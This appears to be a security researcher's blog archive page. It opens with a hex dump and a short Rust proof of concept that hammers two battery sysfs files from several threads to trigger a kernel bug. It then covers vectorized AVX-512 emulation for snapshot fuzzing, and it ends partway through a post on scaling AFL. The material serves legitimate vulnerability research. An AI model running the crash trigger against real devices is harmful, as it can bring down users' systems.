02d0  deadc0de a8c14bf0 d61f0060 a9bf4bf0 b85fc090 716f9e10 712eb61f 54000040
02f0  deadc0de a8c14bf0 d61f0080 a9bf4bf0 b85fc0b0 716f9e10 712eb61f 54000040
0310  deadc0de a8c14bf0 d61f00a0 a9bf4bf0 b85fc0d0 716f9e10 712eb61f 54000040

PoC

extern crate rand;

use std::fs::File;
use std::io::Read;

fn thrasher() {
    // These are the 2 files we want to fuzz
    let random_paths = [
        "/sys/devices/platform/battery/power_supply/battery/mst_switch_test",
        "/sys/devices/platform/battery/power_supply/battery/batt_wireless_firmware_update"
    ];

    // Buffer to read into
    let mut buf = [0x41u8; 8192];

    loop {
        // Pick a random file
        let file = &random_paths[rand::random::<usize>() % random_paths.len()];

        // Read a random number of bytes from the file
        if let Ok(mut fd) = File::open(file) {
            let rsz = rand::random::<usize>() % (buf.len() + 1);
            let _ = fd.read(&mut buf[..rsz]);
        }
    }
}

fn main() {
    // Make fuzzing threads
    let mut threads = Vec::new();
    for _ in 0..4 {
        threads.push(std::thread::spawn(move || thrasher()));
    }

    // Wait for all threads to exit
    for thr in threads {
        let _ = thr.join();
    }
}

Vectorized Emulation: Hardware accelerated taint tracking at 2 trillion instructions per second

14 October 2018 at 21:37

This is the introduction of a multipart series. It is to give a high level overview without really deeply diving into any individual component.

Read the next post in the series: MMU Design

Vectorized emulation, why do I do this to myself?

Why

Changelog

Date Info
2018-10-14 Initial

Tweeter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up, or I think you can use RSS or something if you’re still one of those people.

Performance disclaimer

All benchmarks done here are on a single Xeon Phi 7210 with 96 GiB of RAM. This comes out to about $4k USD, but if you cheap out on RAM and buy used Phis you could probably get the same setup for $1k USD.

This machine has 64 cores and 256 hardware threads. Using AVX-512 I run 4096 32-bit VMs at a time ((512 / 32) * 256).

All performance numbers in this article refer to the machine running at 100% on all cores.

Terminology

Term Inology
Lane A single component in a larger vector (often 32-bit throughout this document)
VM A single VM, in terms of vectorized emulation it refers to a single lane of a vector

Intro

In this blog I’m going to introduce you to a concept I’ve been working on for almost 2 years now. Vectorized emulation. The goal is to take standard applications and JIT them to their AVX-512 equivalent such that we can fuzz 16 VMs at a time per thread. The net result of this work allows for high performance fuzzing (approx 40 billion to 120 billion instructions per second [the 2 trillion clickbait number is theoretical maximum]) depending on the target, while gathering differential coverage on code, register, and memory state.

By gathering more than just code coverage we are able to track state of code deeper than just code coverage itself, allowing us to fuzz through things like memcmp() without any hooks or static analysis of the target at all.

Further since we’re running emulated code we are able to run a soft MMU implementation which has byte-level permissions. This gives us stronger-than-ASAN memory protections, making bugs fail faster and cleaner.

How it came to be an idea

My history with fuzzing tools starts off effectively with my hypervisor for fuzzing, falkervisor. falkervisor served me well for quite a long time, but my work rotated more towards non-x86 targets, which it did not support. With a demand for emulation I made modifications to QEMU for high-performance fuzzing, and ultimately swapped out their MMU implementation for my own which has byte-level permissions. This new byte-level permission model allowed me to catch even the smallest memory corruptions, leading to finding pretty fun bugs!

More and more after working with QEMU I got annoyed. It’s designed for whole systems yet I was using it for fuzzing targets that were running with unknown hardware and running from dynamically dumped memory snapshots. Due to the level of abstraction in QEMU I started to get concerned with the potential unknowns that would affect the instrumentation and fuzzing of targets.

I developed my first MIPS emulator. It was not designed for performance, but rather purely for simple usage and perfect single stepping. You step an instruction, registers and memory get updated. No JIT, no intermediate registers, no flushing or weird block level translation changes. I eventually made a JIT for this that maintained the flush-state-every-instruction model and successfully used it against multiple targets. I also developed an ARM emulator somewhere in this timeframe.

When early 2017 rolls around I’m bored and want to buy a Xeon Phi. Who doesn’t want a 64-core 256-thread single processor? I really had no need for the machine so I just made up some excuse in my head that the high bandwidth memory on die would make reverting snapshots faster. Yeah… like that really matters? Oh well, I bought it.

While the machine was on the way I had this idea… when fuzzing from a snapshot all VMs initially start off fuzzing with the exact same state, except for maybe an input buffer and length being changed. Thus they do identical operations until user-controlled data is processed. I’ve done some fun vectorization work before, but what got me thinking is why not just emit vpaddd instead of add when JITting, and now I can run 16 VMs at a time!

Alas… the idea was born

A primer on snapshot fuzzing

Snapshot fuzzing is fundamental to this work and almost all fuzzing work I have done from 2014 and beyond. It warrants its own blog entirely.

Snapshot fuzzing is a method of fuzzing where you start from a partially-executed system state. For example I can run an application under GDB, like a parser, put a breakpoint after the file/network data has been read, and then dump memory and register state to a core dump using gcore. At this point I have full memory and register state for the application. I can then load up this core dump into any emulator, set up memory contents and permissions, set up register state, and continue execution. While this is an example with core dumps on Linux, this methodology works the same whether the snapshot is a core dump from GDB, a minidump on Windows, or even an exotic memory dump taken from an exploit on a locked-down device like a phone.

All that matters is that I have memory state and register state. From this point I can inject/modify the file contents in memory and continue execution with a new input!

It can get a lot more complex when dealing with kernel state, like file handles, network packets buffered in the kernel, and really anything that syscalls. However in most targets you can make some custom rigging using strace to know which FDs line up, where they are currently seeked, etc. Further a full system snapshot can be used instead of a single application and then this kernel state is no longer a concern.

The benefits of snapshot fuzzing are performance (linear scaling), high levels of introspection (even without source or symbols), and most importantly… determinism. Unless the emulator has bugs snapshot fuzzing is typically deterministic (sometimes relaxed for performance). Find some super exotic race condition while snapshot fuzzing? Well, you can single step through with the same input and now you can look at the trace as a human, even if it’s a 1 in a billion chance of hitting.

A primer on vectorized instruction sets

Since the 90s many computer architectures have some form of SIMD (vectorized) instruction set. SIMD stands for single instruction multiple data. This means that a single instruction performs an operation (typically the same) on multiple different pieces of data. SIMD instruction sets fall under names like MMX, SSE, AVX, AVX512 for x86, NEON for ARM, and AltiVec for PPC. You’ve probably seen these instructions if you’ve ever looked at a memcpy() implementation on any 64-bit x86 system. They’re the ones with the gross 15 character mnemonics and registers you didn’t even know existed.

For a simple case lets talk about standard SSE on x86. Since x86_64 started with the Pentium 4 and the Pentium 4 had up to SSE3 implementations, almost any x86_64 compiler will generate SSE instructions as they’re always valid on 64-bit systems.

SSE provides 128-bit SIMD operations to x86. SSE introduced 16 128-bit registers named xmm0 through xmm15 (only 8 xmm registers on 32-bit x86). These 128-bit registers can be treated as groups of different sized smaller pieces of data which sum up to 128 bits.

  • 4 single precision floats
  • 2 double precision floats
  • 2 64-bit integers
  • 4 32-bit integers
  • 8 16-bit integers
  • 16 8-bit integers

Now with a single instruction it is possible to perform the same operation on multiple floats or integers. For example there is an instruction paddd, which stands for packed add dwords. This means that the 128-bit registers provided are treated as 4 32-bit integers, and an add operation is performed.

Here’s a real example, adding xmm0 and xmm1 together treating them as 4 individual 32-bit integer lanes and storing them back into xmm0

paddd xmm0, xmm1

Register Dword 1 Dword 2 Dword 3 Dword 4
xmm0 5 6 7 8
xmm1 10 20 30 40
xmm0 (result) 15 26 37 48

Cool. Starting with AVX these registers were expanded to 256-bits thus allowing twice the throughput per instruction. These registers are named ymm0 through ymm15. Further AVX introduced three operand form instructions which allow storing a result to a different register than the ones being used in the operation. For example you can do vpaddd ymm0, ymm1, ymm2 which will add the 8 individual 32-bit integers in ymm1 and ymm2 and store the result into ymm0. This helps a lot with register scheduling and prevents many unnecessary movs just to save off registers before they are clobbered.

AVX-512

AVX-512 is a continuation of x86’s SIMD model by expanding from 16 256-bit registers to 32 512-bit registers. These registers are named zmm0 through zmm31. Further AVX-512 introduces 8 new kmask registers named k0 through k7 where k0 has a special meaning.

The kmask registers are used to perform masking on instructions, either by merging or zeroing. This makes it possible to loop through data and process it while having conditional masking to disable operations on a given lane of the vector.

The syntax for the common instructions using kmasks are the following:

vpaddd zmm0 {k1}, zmm1, zmm2

chart simplified to show 4 lanes instead of 16

Register Dword 1 Dword 2 Dword 3 Dword 4
zmm0 9 9 9 9
zmm1 1 2 3 4
zmm2 10 20 30 40
k1 1 0 1 1
zmm0 (result) 11 9 33 44

or

vpaddd zmm0 {k1}{z}, zmm1, zmm2

chart simplified to show 4 lanes instead of 16

Register Dword 1 Dword 2 Dword 3 Dword 4
zmm0 9 9 9 9
zmm1 1 2 3 4
zmm2 10 20 30 40
k1 1 0 1 1
zmm0 (result) 11 0 33 44

The first example uses k1 as the kmask for the add operation. In this case the k1 register is treated as a 16-bit number, where each bit corresponds to each of the 16 32-bit lanes in the 512-bit register. If the corresponding bit in k1 is zero, then the add operation is not performed and that lane is left unchanged in the resultant register.

In the second example there is a {z} suffix on the kmask register selection, this means that the operation is performed with zeroing rather than merging. If the corresponding bit in k1 is zero then the resultant lane is zeroed out rather than left unchanged. This gets rid of a dependency on the previous register state of the result and thus is faster, however it might not be suitable for all applications.

The k0 mask is implicit and does not need to be specified. The k0 register is hardwired to having all bits set, thus the operation is performed on all lanes unconditionally.

Prior to AVX-512 compare instructions in SIMD typically yielded all ones in a given lane if the comparision was true, or all zeroes if it was false. In AVX-512 comparison instructions are done using kmasks.

vpcmpgtd k2 {k1}, zmm10, zmm11

You may have seen this instruction in the picture at the start of the blog. What this instruction does is compare the 16 dwords in zmm10 with the 16 dwords in zmm11, and only performs the compare on lanes enabled by k1, and stores the result of the compare into k2. If the lane was disabled due to k1 then the corresponding bit in the k2 result will be zero. Meaning the only set bits in k2 will be from enabled lanes which were greater in zmm10 than in zmm11. Phew.

Vectorized emulation

Now that you’ve made it this far you might already have some gears turning in your head telling you where this might be going next.

Since with snapshot fuzzing we start executing the same code, we are doing the same operations. This means we can convert the x86 instructions to their vectorized counterparts and run 16 VMs at a time rather than just one.

Let’s make up a fake program:

mov eax, 5
mov ebx, 10
add eax, ebx
sub eax, 20

How can we vectorize this code?

; Register allocation:
; eax = zmm0
; ebx = zmm1

vpbroadcastd zmm0, dword ptr [memory containing constant 5]
vpbroadcastd zmm1, dword ptr [memory containing constant 10]
vpaddd       zmm0, zmm0, zmm1
vpsubd       zmm0, zmm0, dword ptr [memory containing constant 20] {1to16}

Well that was kind of easy. We’ve got a few new AVX concepts here. We’re using the vpbroadcastd instruction to broadcast a dword value to all lanes of a given ZMM register. Since the Xeon Phi is bottlenecked on the instruction decoder it’s actually faster to load from memory than it is to load an immediate into a GPR, move this into a XMM register, and then broadcast it out.

Further we introduce the {1to16} broadcasting that AVX-512 offers. This allows us to use a single dword constant value with in our example vpsubd. This broadcasts the memory pointed to to all 16 lanes and then performs the operation. This saves one instruction as we don’t need an explicit vpbroadcastd.

In this case if we executed this code with any VM state we will have no divergence (no VMs do anything different), thus this example is very easy. It’s pretty much a 1-to-1 translation of the non-vectorized x86 to vectorized x86.

Alright, let’s try one a bit more complex, this time let’s work with VMs in different states:

add eax, 10

becomes

; Register allocation:
; eax = zmm0

vpaddd zmm0, zmm0, dword ptr [memory containing constant 10] {1to16}

Let’s imagine that the value in eax prior to execution is different, let’s say it’s [1, 2, 3, 4] for 4 different VMs (simplified, in reality there are 16).

Register Dword 1 Dword 2 Dword 3 Dword 4
zmm0 1 2 3 4
const 10 10 10 10
zmm0 (result) 11 12 13 14

Oh? This is exactly what AVX is supposed to do… so it’s easy?

Okay it’s not that easy

So you might have noticed we’ve dodged a few things here that are hard. First we’ve ignored memory operations, and second we’ve ignored branches.

Lets talk a bit about AVX memory

With AVX-512 we can load and store directly from/to memory, and ideally this memory is aligned as 512-bit registers are whole 64-byte cache lines. In AVX-512 we use the vmovdqa32 instruction. This will load an entire aligned 64-byte piece of memory into a ZMM register ala vmovdqa32 zmm0, [memory], and we can store with vmovdqa32 [memory], zmm0. Further when using kmasks with vmovdqa32 for loads the corresponding lane is left unmodified (merge masking) or zeroed (zero masking). For stores the value is simply not written if the corresponding mask bit is zero.

That’s pretty easy. But this doesn’t really work well when we have 16 unique VMs we’re running with unique address spaces.

… or does it?

VM memory interleaving

Since most VM memory operations are not affected by user input, and thus are the same in all VMs, we need a way to organize the 16 VMs memory such that we can access them all quickly. To do this we actually interleave all 16 VMs at the dword level (32-bit). This means we can perform a single vmovdqa32 to load or store to memory for all 16 VMs as long as they’re accessing the same address.

This is pretty simple, just interleave at the dword level:

chart simplified to show 4 lanes instead of 16

Guest Address Host Address Dword 1 Dword 2 Dword 3 Dword 16
0x0000 0x0000 1 2 3 33
0x0004 0x0040 32 74 55 45
0x0008 0x0080 24 24 24 24

All we need to do is take the guest address, multiply it by 16, and then vmovdqa32 from/to that address. It once again does not matter what the contents of the memory are for each VM and they can differ. The vmovdqa32 does not care about the memory contents.

In reality the host address is not just the guest address multiplied by 16 as we need some translation layer. But that will get it’s own entire blog. For now let’s just assume a flat, infinite memory model where we can just multiply by 16.

So what are the limitations of this model?

Well when reading bytes we must read the whole dword value and then shift and mask to extract the specific byte. When writing a byte we need to read the memory first, shift, mask, and or in the new byte, and write it out. And when doing non-aligned operations we need to perform multiple memory operations and combine the values via shifting and masking. Luckily compilers (and programmers) typically avoid these unaligned operations and they’re rare enough to not matter much.

Divergence

So far everything we have talked about does not care about the values it is operating on at all, thus everything has been easy so far. But in reality values do matter. There are 3 places where divergence matters in this entire system:

  • Loads/stores with different addresses
  • Branches
  • Exceptions/faults

Loads/stores with different addresses

Let’s knock out the first one real quick, loads and stores with different addresses. For all memory accesses we do a very quick horizontal comparison of all the lanes first. If they have the same address then we take a fast path and issue a single vmovdqa32. If their addresses differ than we simply perform 16 individual memory operations and emulate the behavior we desire. It technically can get a bit better as AVX-512 has scatter/gather instructions which allow the CPU to do this load/storing to different addresses for us. This is done with a base and an offset, with 32-bits it’s not possible to address the whole address space we need. However with 64-bit vectorization (8 64-bit VMs) we can leverage scatter/gather instructions to their fullest and all loads and stores just become a fast path with one vmovdqa32, or a slow (but fast) path where we use a single scatter/gather instruction.

Branches

We’ve avoided this until now for a reason. It’s the single hardest thing in vectorized emulation. How can we possibly run 16 VMs at a time if one branches to another location. Now we cannot run a AVX-512 instruction as it would be invalid for the VMs which have gone down a different path.

Well it turns out this isn’t a terribly hard problem on AVX-512. And when I say AVX-512 I mean specifically AVX-512. Feel free to ponder why this might be based on what you’ve learned is unique to AVX-512.

Okay it’s kmasks. Did you get it right? Well kmasks save our lives. Remember the merging kmasks we talked about which would disable updates to a given lane of a vector and ignore writes to a given lane if it is not enabled in the kmask?

Well by using a kmask register on all JITted AVX-512 instructions we can simply change the kmask to disable updates on a given VM.

What this allows us to do is start execution at the same location on all 16 VMs as they start with the same EIP. On all branches we will horizontally compare the branch targets and compute a new kmask value to use when we continue execution on the new branch.

AVX-512 doesn’t have a great way of extracting or broadcasting arbitrary elements of a vector. However it has a fast way to broadcast the 0th lane in a vector ala vpbroadcastd zmm0, xmm0. This takes the first lane from xmm0 and broadcasts it to all 16 lanes in zmm0. We actually never stop following VM #0. This means VM #0 is always executing, which is important for all of the horizontal compares that we talk about. When I say horizontal compare I mean a broadcast of the VM#0 and compare with all other VMs.

Let’s look in-detail at the entire JIT that I use for conditional indirect branches:

; IL operation is Beqz(val, true_target, false_target)
;
; val          - 16 32-bit values to conditionally branch by
; true_target  - 16 32-bit guest branch target addresses if val == 0
; false_target - 16 32-bit guest branch target addresses if val != 0
;
; IL pseudocode:
;
; if val == 0 {
;    goto true_target;
; } else {
;    goto false_target;
; }
;
; Register usage
; k1    - The execution kmask, this is the kmask used on all JITted instructions
; k2    - Temporary kmask, just used for scratch
; val   - Dynamically allocated zmm register containing val
; ttgt  - Dynamically allocated zmm register containing true_target
; ftgt  - Dynamically allocated zmm register containing false_target
; zmm0  - Scratch register
; zmm31 - Desired branch target for all lanes

; Compute a kmask `k2` which contains `1`s for the corresponding lanes
; for VMs which are enabled by `k1` and also have a non-zero value.
; TL;DR: k2 contains a mask of VMs which will be taking `ftgt`
vptestmd k2 {k1}, val, val

; Store the true branch target unconditionally, while not clobbering
; VMs which have been disabled
vmovdqa32 zmm31 {k1}, ttgt

; Store the false branch target for VMs not taking the branch
; Note the use of k2
vmovdqa32 zmm31 {k2}, ftgt

; At this point `zmm31` contains the targets for all VMs. Including ones
; that previously got disabled.

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

; ...
; Now just rip out the target for VM #0 and translate the guest address
; into the host JIT address and jump there.
; Or break out and generate the JIT if it hasn't been hit before

The above code is quite fast and isn’t a huge performance issue, especially as we’re running 16 VMs at a time and branches are “rare” with respect to expensive operations like memory loads and stores.

One thing that is important to note is that zmm31 always contains the last desired branch target for a given VM. Even after it has been disabled. This means that it is possible for a VM which has been disabled to come back online if VM #0 ends up going to the same location.

Lets go through a more thorough example:

; Register allocation:
; ebx - Pointer to some user controlled buffer
; ecx - Length of controlled buffer

; Validate buffer size
cmp ecx, 4
jne .end

; Fallthrough
.next:

; Check some magic from the buffer
cmp dword ptr [ebx], 0x13371337
jne .end

; Fallthrough
.next2:

; Conditionally jump to end, for clarity
jmp .end

.end:

And the theoretical vectorized output (not actual JIT output):

; Register allocation:
; zmm10 - ebx
; zmm11 - ecx
; k1    - The execution kmask, this is the kmask used on all JITted instructions
; k2    - Temporary kmask, just used for scratch
; zmm0  - Scratch register
; zmm8  - Scratch register
; zmm31 - Desired branch target for all lanes

; Compute kmask register for VMs which have `ecx` == 4
vpcmpeqd k2 {k1}, zmm11, dword ptr [memory containing 4] {1to16}

; Update zmm31 to reference the respective branch target
vmovdqa32 zmm31 {k1}, address of .end  ; By default we go to end
vmovdqa32 zmm31 {k2}, address of .next ; If `ecx` == 4, go to .next

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

; Branch to where VM #0 is going (simplified)
jmp where_vm0_wants_to_go

.next:

; Magicially load memory at ebx (zmm10) into zmm8
vmovdqa32 zmm8, complex_mmu_operation_and_stuff

; Compute kmask register for VMs which have packet contents 0x13371337
vpcmpeqd k2 {k1}, zmm8, dword ptr [memory containing 0x13371337] {1to16}

; Go to .next2 if memory is 0x13371337, else go to .end
vmovdqa32 zmm31 {k1}, address of .end   ; By default we go to end
vmovdqa32 zmm31 {k2}, address of .next2 ; If contents == 0x13371337 .next2

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

; Branch to where VM #0 is going (simplified)
jmp where_vm0_wants_to_go

.next2:

; Everyone still executing is unconditionally going to .end
vmovdqa32 zmm31 {k1}, address of .end

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

.end:

Okay so what does the VM state look like for a theoretical version (simplified to 4 VMs):

Starting state, all VMs enabled with different memory contents (pointed to by ebx) and different packet lengths:

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 1 1 1

First branch, all VMs with ecx != 4 are disabled and are pending branches to .end, VM #1 falls off

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 0 1 1
Zmm31 .next .end .next .next

Second branch, VMs without 0x13371337 in memory are pending branches to .end, VM #2 falls off

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 0 0 1
Zmm31 .next2 .end .end .next2

Final branch, everyone ends up at .end, all VMs are enabled again as they’re following VM #0 to .end

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 1 1 1
Zmm31 .end .end .end .end

Branch summary

So we saw branches will disable VMs which do not follow VM #0. When VMs are disabled all modifications to their register states or memory states are blocked by hardware. The kmask mechanism allows us to keep performance up and not use different JITs based on different branch states.

Further, VMs can come back online if they were pending to go to a location which VM #0 eventually ends up going to.

Exceptions/faults

These are really just glorified branches with a VM exit to save the input and memory/register state related to the crash. No reason to really go in depth here.



Okay but why?

Okay we’ve covered all the very high level details of how vectorized emulation is possible but that’s just academic thought. It’s pointless unless it accomplishes something.

At this point all of the next topics are going to be their own blogs and thus are only lightly touched on

Differential coverage / Hardware accelerated taint tracking

Differential coverage is a special type of coverage that we are able to gather with this vectorized emulation model. This is the most important aspect of all of this tooling and is the main reason it is worth doing.

Since we are running 16 VMs at a time we are able to very cheaply (a few cycles) do a horizontal comparison with other VMs. Since VMs are deterministic and only have differing user-controlled inputs any situation where VMs have different branches, different register states, different memory states, etc is when the user input directly or indirectly caused a change in behavior.

I would consider this to be the holy grail of coverage. Any affect the input has on program state we can easily and cheaply detect.

How differential coverage combats state explosion

If we wanted to track all register states for all instructions the state explosion would be way too huge. This can be somewhat capped by limiting the amount of state each instruction can generate. For example instead of storing all unique register values for an instruction we could simply store the minimums and maximums, or store up to n unique values, etc. However even when limited to just a few values per instruction, the state explosion is too large for any real application.

However, since most memory and register states are not influenced by user input, with differential coverage we can greatly reduce the amount of instructions which state is stored on as we only store state that was influenced by user data.

This works for code coverage as well, for example if we hit a printf with completely uncontrolled parameters that would register as potentially hundreds of new blocks of coverage. With differential coverage all of this state can be ignored.

How differential coverage is great for performance

While the focus of this tool is not performance, the performance costs of updating databases on every instruction is not feasible. By filtering only instructions which have user-influenced data we’re able to perform much more complex operations in the case that new coverage was detected.

For example all of my register loads and stores start with a horizontal compare and a quick jump out if they all match. If one differs it’s a rare enough occasion that it’s feasible to spend a few more cycles to do a hash calculation based on state and insertion into the global input and coverage databases. Without differential coverage I would have to unconditionally do this every instruction.

Soft MMU

Since the soft MMU deserves a blog entirely on it’s own, we’ll just go slightly into the details.

As mentioned before, we interleave memory at the dword level, but for every byte there is also a corresponding permission byte. In memory this looks like 16 32-bit dwords representing the permissions, followed by 16 32-bit dwords containing their corresponding memory contents. This allows me to read a 64-byte cache line with the permissions which are checked first, followed by reading the 64-byte cache line directly following with the contents.

For permissions: the read, write, and execute bits are completely separate. This allows more exotic memory models like execute-only memory.

Since permissions are at the byte level, this means we can punch a one-byte hole anywhere in memory and accessing that byte would cause a fault. For some targets I’ll do special modifications to permissions and punch holes in unused or padding fields of structures to catch overflows of buffers contained inside structures.

Further I have a special read-after-write (RaW) bit, which is used to mark memory as uninitialized. Memory returned from allocators is marked as RaW and thus will fault if ever read before written to. This is tracked at the byte level and is one of the most useful features of the MMU. We’ll talk about how this can be made fast in a subsequent blog.

Performance

Performance is not the goal of this project, however the numbers are a bit better than expected from the theorycrafting.

In reality it’s possible to hit up to 2 trillion emulated instructions per second, which is the clickbait title of this blog. However this is on a 32-deep unrolled loop that is just adding numbers and not hitting memory. This unrolling makes the branch divergence checking costs disappear, and integer operations are almost a 1-to-1 translation into AVX-512 instructions.

For a real target the numbers are more in the 40 billion to 120 billion emulated instructions per second range. For a real target like OpenBSD’s DHCP client I’m able to do just over 5 million fuzz cases per second (fuzz case is one DHCP transaction, typically 1 or 2 packets). For this specific target the emulation speed is 54 billion instructions per second. This is while gathering PC-level coverage and all register and memory divergence coverage.

So it’s just academic?

I’ve been working on this tooling for almost 2 years now and it’s been usable since month 3. It’s my primary tool for fuzzing and has successfully found bugs in various targets. Sadly most of these bugs are not public yet, but soon.

This tool was used to find a remote bluescreen in Windows Firewall: CVE-2018-8206 (okay technically I found it first manually, but was able to find it with the fuzzer with a byte flipper even though it has much more complex constraints)

It was also used to find a theoretical OOB in OpenBSD’s dhclient: dhclient bug . This is a fun one as really no tradtional fuzzer would find this as it’s an out-of-bounds by 1 inside of a structure.

Future blogs

  • Description of the IL used, as it’s got some specific designs for vectorized emulation

  • Internal details of the MMU implementation

  • Showing the power of differential coverage by looking a real example of fuzzing an HTTP parser and having a byte flipper quickly (under 5 seconds) find the basic “VERB HTTP/number.number\r\n". No magic, no `strings` feedback, no static analysis. Just a useless fuzzer with strong harnessing.

  • Talk about the new IL which handles graphs and can do cross-block optimizations

  • Showing better branch divergence handling via post-dominator analysis and stepping VMs until they sync up at a known future merge point

Scaling AFL to a 256 thread machine

16 September 2018 at 22:51

That's a lot of cores

Changelog

Date Info
2018-09-16 Initial
2018-09-16 Changed custom JPEG test program a little, saves 2 syscalls bringing us from 9 per fuzz case to 7 fuzz case. Used -O2 flag to build. Neither of these had a noticeable impact on performance thus performance numbers were not updated.

Performance disclaimer

Performance is critical to my work and I’ve been researching specifically fuzzer performance and scaling for the past 5 years. It’s important that the performance numbers here are accurate and use tooling to their fullest. Please let me know about any suggestions that I could do to make these numbers better while still using unmodified AFL. I also was using a stock libjpeg as I do not want to make internal mods to JPEG as that increases risk of invalid results.

The machine this testing was done on is a single socket Intel Xeon Phi 7210 a 64-core 256-thread machine (yes, 4 HW threads per core). This is clocked at 1.3 GHz and the cores are effectively Atom cores, making the much weaker than conventional ones. A single 1.3 GHz Phi core here usually runs identical code about 10-20x slower than a conventional modern Xeon at 2.8 GHz. This means that numbers here might seem unreasonably low compared to what you may expect, but it’s because these are weak cores.

Intro

I’ve been trying to get AFL to scale correctly for the past day, which turns out to be fairly hard. AFL doesn’t really provide any built in way of just spinning up multiple cores by using something like afl-fuzz -j64 ..., so we have to do it ourselves. Further the machine I’m trying this on is quite exotic and not much scales correctly to it anyways. But, let’s hop right on in and give it a go! This testing is actually being done for an upcoming blog series demonstrating a neat new way of fuzzing and harnessing that I call “Vectorized Emulation”. I wanted to get the best performance numbers out of AFL so I had a reasonable comparison that would make some of the tech a bit more relatable. Stay tuned for that post hopefully within a week!

In this blog I’m going to talk about the major things to keep an eye on when you’re trying to get every drop of performance:

  • Are you using all your cores?
  • Are you scaling well?
  • Are you spending time in your actual target or other things like the kernel?

If you’re just spinning up one process per core, it’s very possible that all of these are not true. We’ll go through a real example of this process and how easy it is to fall into a trap of not effectively using your cores.

Target selection

First of all, we need a good target that we can try to fuzz as fast as possible. Something that is common, reasonably small, and easy to convert to use AFL persistent mode. I’ve decided to look at libjpeg-turbo as it’s a common target, many people are probably already familiar, and it’s quite simple to just throw in a loop. Further if we found a bug it’d be a pretty good day, so it’s always fun to play with real targets.

Fuzzing out of the can

The first thing I’m going to try on almost any new target I look at will be to find a tool that already comes with the source that in some way parses the image. In this case for libjpeg-turbo we can actually use the tool that comes with called djpeg. This is a simple command line utility that takes in a file over stdin or via a command line argument, and produces another output file potentially of another format. Since we know we are going to use AFL, let’s get a basic AFL environment set up. It’s pretty simple, and in our case we’re using afl-2.52b the latest at the time of writing this blog. We’re not using ASAN as we’re looking for best case performance numbers.

pleb@debphi:~/blogging$ wget http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
--2018-09-16 16:09:11--  http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
Resolving lcamtuf.coredump.cx (lcamtuf.coredump.cx)... 199.58.85.40
Connecting to lcamtuf.coredump.cx (lcamtuf.coredump.cx)|199.58.85.40|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 835907 (816K) [application/x-gzip]
Saving to: ‘afl-latest.tgz’

afl-latest.tgz                                              100%[========================================================================================================================================>] 816.32K   323KB/s    in 2.5s

2018-09-16 16:09:14 (323 KB/s) - ‘afl-latest.tgz’ saved [835907/835907]

pleb@debphi:~/blogging$ tar xf afl-latest.tgz
pleb@debphi:~/blogging$ cd afl-2.52b/
pleb@debphi:~/blogging/afl-2.52b$ make -j256
[*] Checking for the ability to compile x86 code...
[+] Everything seems to be working, ready to compile.
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-gcc.c -o afl-gcc -ldl
set -e; for i in afl-g++ afl-clang afl-clang++; do ln -sf afl-gcc $i; done
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-fuzz.c -o afl-fuzz -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-showmap.c -o afl-showmap -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-tmin.c -o afl-tmin -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-gotcpu.c -o afl-gotcpu -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-analyze.c -o afl-analyze -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-as.c -o afl-as -ldl
ln -sf afl-as as
[*] Testing the CC wrapper and instrumentation output...
